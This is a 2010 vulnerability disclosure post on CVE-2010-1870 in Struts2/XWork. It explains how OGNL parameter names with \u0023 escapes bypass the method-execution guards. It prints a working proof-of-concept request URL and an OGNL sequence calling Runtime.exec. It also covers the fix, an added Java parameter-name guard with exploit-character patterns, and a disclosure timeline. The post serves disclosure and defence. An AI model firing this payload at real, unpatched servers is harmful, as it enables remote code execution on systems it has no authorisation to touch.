Friday, July 9, 2010
CVE-2010-1870: Struts2/XWork remote command execution
Update Tue Jul 13 2010: Added proof of concept
The Apache Struts team has uploaded, but has not yet released, due to
an unreasonably prolonged voting process, the 2.2.0 release of the
Struts2 web framework, which fixes a vulnerability that I reported to
them on May 31st 2010. The Apache Struts team is ridiculously slow in
releasing the fixed version and all of my attempts to expedite the
process have failed.
Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke
actions and call appropriate setters/getters based on HTTP parameter
names, which is achieved by treating each HTTP parameter name as an OGNL
statement. OGNL (Object Graph Navigation Language) is what turns:
user.address.city=Bishkek&user['favoriteDrink']=kumys
into
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor, which calls
ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork's ParametersInterceptor or operate with
OGNL ValueStack in a similar way then you are vulnerable
(ParametersInterceptor is on by default in struts-default.xml).
In addition to property getting/setting, OGNL supports many more
features:
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
Since HTTP parameter names are OGNL statements, to prevent an attacker
from calling arbitrary methods via HTTP parameters XWork has the
following two variables guarding method execution:
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'
(set to true by default)
* SecurityMemberAccess private field called
'allowStaticMethodAccess' (set to false by default)
OGNL Context variables
To make it easier for developers to access various frequently needed
objects XWork provides several predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
These variables represent various server-side objects, such as the
session map. To prevent attackers from tampering with server-side
objects XWork's ParametersInterceptor disallowed # in parameter names.
About a year ago I found a way to bypass that protection (XW-641) using
Java's unicode String representation: \u0023. At the time I felt that
the fix that was implemented (OGNL value stack clearing) was
insufficient, but had no time to investigate this further.
CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found
that in addition to the above mentioned context variables there were
more:
* #context - OgnlContext, the one guarding method execution based on
'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticMethodAccess'
field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
You can probably see the problem already. Using the XW-641 trick I was
able to modify the values that were guarding Java method execution and
run arbitrary Java code:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java.lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
The actual proof of concept had to use OGNL's expression evaluation when
crafting the HTTP request. The PoC for this bug will be published on
July 12 2010. To test whether your application is vulnerable you can use
the following proof of concept, which will call
java.lang.Runtime.getRuntime().exit(1):
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Fixing CVE-2010-1870
Struts2 users must upgrade to 2.2.0, which whitelists a set of
characters that excludes the characters required to exploit this
vulnerability.
In cases where an upgrade isn't possible you can use
ParametersInterceptor's "excludeParams" parameter to whitelist the
characters required for your application to operate correctly (usually
A-z0-9_.'"[]); alternatively you can blacklist \()@, which are the
characters required to exploit this bug.
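The two points above, the XW-641 unicode-escape bypass of the # check and the character whitelist/blacklist workaround, come down to one rule for a guard on parameter names: normalise the name the way OGNL's lexer will before checking it, or reject the escape character outright. The following class is an added example written for this page; it is not code from the original post, from XWork or from the Struts project. It assumes a plain Java string check that an application could run in its own interceptor or servlet filter before parameters reach the value stack; the class name, method names and the sample parameter names are constructed for the example (two benign names and two shaped like the PoC above). In Java source a literal backslash-u sequence has to be written with a doubled backslash, which is why the escapes below appear as \\u0023.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not from the original post or the Struts/XWork projects):
 * a defensive check for HTTP parameter names before they are handed to the
 * OGNL value stack. It applies the two lessons of the post: decode Java/OGNL
 * unicode escapes first (the XW-641 bypass), and allow only the characters
 * the post lists as needed by a typical application.
 */
public class ParamNameGuard {

    // A backslash, 'u' and four hex digits: the \\uXXXX escape form that
    // OGNL's lexer decodes exactly as Java does, so "\\u0023" becomes '#'.
    private static final Pattern UNICODE_ESCAPE =
            Pattern.compile("\\\\u([0-9a-fA-F]{4})");

    // Whitelist from the post: A-z0-9_.'"[] (assumed to be enough for a
    // typical application; adjust to your own parameter naming scheme).
    // Backslash is deliberately absent, so escaped forms fail this check too.
    private static final Pattern ACCEPTED_NAME =
            Pattern.compile("^[A-Za-z0-9_.'\"\\[\\]]+$");

    // Blacklist from the post: \ ( ) @ are needed to exploit the bug, and
    // '#' is what reaches the OGNL context variables (#context, #_memberAccess).
    private static final Pattern EXPLOIT_CHARS =
            Pattern.compile("[\\\\()@#]");

    /** Decode \\uXXXX escapes so that a check for '#' also sees "\\u0023". */
    static String decodeUnicodeEscapes(String s) {
        Matcher m = UNICODE_ESCAPE.matcher(s);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            char c = (char) Integer.parseInt(m.group(1), 16);
            m.appendReplacement(out, Matcher.quoteReplacement(String.valueOf(c)));
        }
        m.appendTail(out);
        return out.toString();
    }

    /** Whitelist check on the raw name (the "excludeParams"-style approach from the post). */
    static boolean isAcceptedName(String rawName) {
        return ACCEPTED_NAME.matcher(rawName).matches();
    }

    /** Blacklist check: decode first, then look for exploit characters. Checking the
     *  raw string here is exactly the mistake the \\u0023 bypass took advantage of. */
    static boolean containsExploitChars(String rawName) {
        String decoded = decodeUnicodeEscapes(rawName);
        return EXPLOIT_CHARS.matcher(decoded).find();
    }

    public static void main(String[] args) {
        // Constructed sample parameter names: two benign, two shaped like the PoC in the post.
        String[] names = {
            "user.address.city",
            "user['favoriteDrink']",
            "\\u0023_memberAccess['allowStaticMethodAccess']",
            "('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime())"
        };
        for (String n : names) {
            System.out.printf("%-72s accepted=%-5b exploitChars=%b%n",
                    n, isAcceptedName(n), containsExploitChars(n));
        }
    }
}
```

Run with `javac ParamNameGuard.java && java ParamNameGuard`. The two benign names pass the whitelist and contain no exploit characters; the two PoC-shaped names fail the whitelist (the backslash alone rules them out) and, once decoded, contain # and @. A guard that only searched the raw name for # would have reported the third name as clean, which is the XW-641 bypass in one line.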
Timeline
May 31st - email to security@struts.apache.org with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and
Struts developers worked together in coming up with the fix.
June 20th - 1-line fix committed
June 29th - Struts 2.2.0 release voting process started and is still
going...